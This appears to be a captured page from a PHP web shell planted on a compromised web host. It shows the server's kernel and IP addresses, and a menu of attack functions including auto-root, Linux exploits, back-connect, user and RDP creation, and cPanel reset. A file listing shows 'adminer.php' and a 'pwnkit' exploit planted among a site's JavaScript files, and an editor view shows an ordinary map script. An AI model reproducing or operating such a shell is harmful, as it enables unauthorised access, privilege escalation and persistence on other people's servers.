Linux web15f56.uni5.net 5.4.282-1.el8.elrepo.x86_64 #1 SMP Mon Aug 19 18:33:22 EDT 2024 x86_64
Apache
: 187.1.136.155 | : 216.73.216.129
Cant Read [ /etc/named.conf ]
7.4.33
argiplam
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
argiplam /
www /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
adminer.php
465.43
KB
-rw-r--r--
bootstrap.min.js
36.18
KB
-rw-r--r--
custom.min.js
2.03
KB
-rw-r--r--
jquery.mask.min.js
7.27
KB
-rw-r--r--
jquery.slimscroll.js
4.37
KB
-rw-r--r--
main.js
5.45
KB
-rw-r--r--
map-custom.js
7.75
KB
-rw-r--r--
pwnkit
10.99
KB
-rw-r--r--
slick-custom.js
7.57
KB
-rw-r--r--
waves.js
4.14
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : map-custom.js
(function ($) { // USE STRICT "use strict"; $(document).ready(function () { var selector_map = $('#google_map'); var img_pin = selector_map.attr('data-pin'); var data_map_x = selector_map.attr('data-map-x'); var data_map_y = selector_map.attr('data-map-y'); var scrollwhell = selector_map.attr('data-scrollwhell'); var draggable = selector_map.attr('data-draggable'); if (img_pin == null) { img_pin = 'images/icons/location.png'; } if (data_map_x == null || data_map_y == null) { data_map_x = 40.007749; data_map_y = -93.266572; } if (scrollwhell == null) { scrollwhell = 0; } if (draggable == null) { draggable = 0; } var style = [ { "featureType": "all", "elementType": "geometry.fill", "stylers": [ { "weight": "2.00" } ] }, { "featureType": "all", "elementType": "geometry.stroke", "stylers": [ { "color": "#9c9c9c" } ] }, { "featureType": "all", "elementType": "labels.text", "stylers": [ { "visibility": "on" } ] }, { "featureType": "landscape", "elementType": "all", "stylers": [ { "color": "#f2f2f2" } ] }, { "featureType": "landscape", "elementType": "geometry.fill", "stylers": [ { "color": "#ffffff" } ] }, { "featureType": "landscape.man_made", "elementType": "geometry.fill", "stylers": [ { "color": "#ffffff" } ] }, { "featureType": "poi", "elementType": "all", "stylers": [ { "visibility": "off" } ] }, { "featureType": "road", "elementType": "all", "stylers": [ { "saturation": -100 }, { "lightness": 45 } ] }, { "featureType": "road", "elementType": "geometry.fill", "stylers": [ { "color": "#eeeeee" } ] }, { "featureType": "road", "elementType": "labels.text.fill", "stylers": [ { "color": "#7b7b7b" } ] }, { "featureType": "road", "elementType": "labels.text.stroke", "stylers": [ { "color": "#ffffff" } ] }, { "featureType": "road.highway", "elementType": "all", "stylers": [ { "visibility": "simplified" } ] }, { "featureType": "road.arterial", "elementType": "labels.icon", "stylers": [ { "visibility": "off" } ] }, { "featureType": "transit", "elementType": "all", "stylers": [ { "visibility": "off" } ] }, { "featureType": "water", "elementType": "all", "stylers": [ { "color": "#46bcec" }, { "visibility": "on" } ] }, { "featureType": "water", "elementType": "geometry.fill", "stylers": [ { "color": "#c8d7d4" } ] }, { "featureType": "water", "elementType": "labels.text.fill", "stylers": [ { "color": "#070707" } ] }, { "featureType": "water", "elementType": "labels.text.stroke", "stylers": [ { "color": "#ffffff" } ] } ]; var latitude = data_map_x, longitude = data_map_y, map_zoom = 14; var locations = [ ['<div class="infobox"><h4>Pato</h4><p>Now that you visited our website, how' + ' <br>about checking out our office too?</p></div>' , latitude, longitude, 2] ]; if (selector_map !== undefined) { var map = new google.maps.Map(document.getElementById('google_map'), { zoom: 15, scrollwheel: scrollwhell, navigationControl: true, mapTypeControl: false, scaleControl: false, draggable: draggable, styles: style, center: new google.maps.LatLng(latitude, longitude), mapTypeId: google.maps.MapTypeId.ROADMAP }); } var infowindow = new google.maps.InfoWindow(); var marker, i; for (i = 0; i < locations.length; i++) { marker = new google.maps.Marker({ position: new google.maps.LatLng(locations[i][1], locations[i][2]), map: map, icon: img_pin }); google.maps.event.addListener(marker, 'click', (function(marker, i) { return function() { infowindow.setContent(locations[i][0]); infowindow.open(map, marker); } })(marker, i)); } }); })(jQuery);
Close